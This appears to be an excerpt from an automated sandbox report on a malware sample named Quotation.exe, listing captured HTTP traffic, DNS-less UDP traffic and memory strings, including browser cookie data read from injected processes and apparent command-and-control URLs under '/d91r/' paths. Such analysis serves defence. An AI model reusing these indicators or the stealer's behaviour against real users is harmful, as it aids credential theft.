74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 14:06:43 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:07:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: explorer.exe, 0000000C.00000002.26450887427.000000001391C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000004F7C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012B8C000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
        Source: control.exe, 0000000D.00000002.26404796231.0000000002DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
        Source: control.exe, 0000000D.00000002.26404796231.0000000002DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
        Source: control.exe, 0000000D.00000002.26404796231.0000000002DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rompt","domain":"www.facebook.com"},{"applied_po equals www.facebook.com (Facebook)
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://23.83.160.2:88/tz.php?ref=
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://batit.aliyun.com/alww.html
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014AEA000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000614A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://browsehappy.com/
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: Quotation.exe, 0000000A.00000003.22205813176.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629243441.000000000323D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.21921625783.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629997172.0000000003233000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22628815000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758686717.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630408575.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Quotation.exe, 0000000A.00000003.22205813176.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629243441.000000000323D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.21921625783.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629997172.0000000003233000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22628815000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758686717.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630408575.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: explorer.exe, 0000000C.00000002.26446251562.00000000105A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23160917814.00000000105A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22676296155.00000000105A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24120801059.00000000105A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicer
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22652431593.000000000908A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26420764035.000000000908A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132035553.00000000105E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26446938222.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23170131736.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23187025355.00000000105E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2r
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
        Source: Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 0000000C.00000003.23174182850.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182957260.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26420764035.0000000008FFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26435807561.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22652431593.0000000008FFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132035553.00000000105E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26446938222.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22652431593.000000000908A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23170131736.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26420764035.000000000908A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23187025355.00000000105E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132035553.00000000105E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26446938222.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23170131736.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23187025355.00000000105E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
        Source: explorer.exe, 0000000C.00000000.22639249387.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26403643909.00000000004B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
        Source: Quotation.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: Quotation.exeString found in binary or memory: http://s.symcd.com06
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://s2.symcb.com0
        Source: explorer.exe, 0000000C.00000002.26407630813.00000000022A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22657835861.000000000A760000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22656044134.0000000009560000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: explorer.exe, 0000000C.00000003.24127896554.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CB5F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crt0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://sv.symcd.com0&
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://trade.webnames.ru
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://trade.webnames.ru/img/og_image.png
        Source: Quotation.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
        Source: Quotation.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: Quotation.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.comwww.b-tek.media
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.comwww.cactus-market.ru
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.comwww.texasgent.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.media
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.media/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.media/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.mediawww.dexmart.xyz
